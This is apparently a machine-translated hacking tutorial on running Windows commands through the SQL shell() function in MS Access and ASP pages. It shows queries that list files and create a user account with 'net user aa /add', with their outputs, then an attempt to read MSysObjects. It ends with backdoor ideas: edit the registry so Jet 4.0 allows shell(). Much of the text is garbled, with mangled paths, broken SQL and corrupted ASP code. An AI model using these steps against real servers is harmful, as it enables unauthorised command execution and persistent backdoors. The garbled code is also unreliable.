Access test files

1. shell testing;

First, we can directly query SQL in accessl:
Statement: SELECT shell (c: winntsystem320000.exe/c dir c:> c: 3456.txt );


"Run" to get the result:
C:> dir 123456.txt
The volume in drive C is not labeled.
The serial number of the volume is 3CEE-A8A9.

C: Directory

1,718 123456.txt
1 file, 1,718 bytes
0 directories, 1,224,527,872 available bytes
C:> type 123456.txt
The volume in drive C is not labeled.
The serial number of the volume is 3CEE-A8A9.

C: Directory

44 1.txt
49 11.txt
0 123456.txt
478 333.txt
........................................................
Figure:


Successfully executed. Let's look at the permissions.
Statement changed:
SELECT shell (c: winntsystem322.16.exe/c net user aa/add );
After running:
C:> net user

KAK-E8UHOQQ9M6S User Account

----------------------------------------------
Aa Administrator
IUSR_KAK-E8UHOQQ9M6S IWAM_KAK-E8UHOQQ9M6S
The command is successfully completed.

It seems that the permission is relatively large (however, it may have inherited the permissions of the user running access, I use the Administrator permission to run the operation, and I have not tested the guest)

Run the following command in the test sp: First, write an asp file by yourself. The Code is as follows:
<%
Set Conn = Server. CreateObject ("ADODB. Connection ")
Dsn = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. MapPath ("q. mdb ")
Set Rs = Server. CreateObject ("ADODB. Recordset ")
Conn. Open dsn
SQL = "select shell (c: winntsystem320000.exe/c dir c:> d: sss1.txt )"
Rs. open SQL, conn
If rs. eof and rs. bof then
Access Denied
Else
Access Allowed
End if
Rs. close
Set rs = nothing
Close connection
Conn. close
Set conn = nothing
Response. write "SQL:" & SQL

%>

Run asp and the returned result is as follows:


Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft JET Database Engine error 80040e14
The shell function is not defined in the expression.
/Test/lse/Connections/kaoo6.asp, Row 7

The prompt "shell function is undefined" indicates that the test fails.
Dsn = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. MapPath ("q. mdb ")
Change to dsn = "Provider = Microsoft. Jet. OLEDB.3.5; Data Source =" & Server. MapPath ("q. mdb ")

Run ie and return:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
ADODB. Connection error 800a0e7a
Provider cannot be found. It may not be properly installed.
/Test/lse/Connections/kaoo8.asp, Row 5


The Provider is not installed and the test is not continued.


2. Test the brute-force database.
Here MsysObjecs is used: we create a new query. The statement is as follows:
SELECT MSysObjects. DateCreate, MSysObjects. DateUpdate, SysObjects. Name, ysObjects. Type ROM MSysObjects;
MSysObjects. DateCreate get build time
MSysObjects. DateUpdate Update Time
MSysObjects. Name Database Name
MSysObjects. Type Database Type

Run the preceding statement to obtain the result:

Put it in asp:
<%
Set Conn = Server. CreateObject ("ADODB. Connection ")
Dsn = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. MapPath ("q. mdb ")
Set Rs = Server. CreateObject ("ADODB. Recordset ")
Conn. Open dsn
SQL = "SELECT MSysObjects. DateCreate, MSysObjects. DateUpdate, MSysObjects. Name, MSysObjects. Type FROM MSysObjects ;"
Rs. open SQL, conn
If rs. eof and rs. bof then
Access Denied
Else
Access Allowed
End if
Rs. close
Set rs = nothing
Close connection
Conn. close
Set conn = nothing
Response. write "SQL:" & SQL

%>

Ie returns:
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft JET Database Engine error 80040e09
Records cannot be read; data is not read on MSysObjects.
/Test/lse/Connections/kaoo7.asp, Row 7
Figure:


The system prompts that the record cannot be read. The MSysObjects does not have the permission to read data. No way, this method is not enough.

3. Supplement:
In iis5 (Microsoft. jet. OLEDB.4.0) We cannot directly execute shell (it is said that it can be used in Jet 3.5, that is, in the iis4 era), in Jet. OLEDB.4.0 is not allowed by default, but it can be set. We can change the Registry to implement it.
Backdoor ideas:
1. Change the Registry above to allow Jet. OLEDB.4.0 to support shell so that we can directly use it in asp.
2. We use other programs to directly operate the mdb file and use select shell () to execute system commands.

(Data packaging) [accidentally dropped 5555]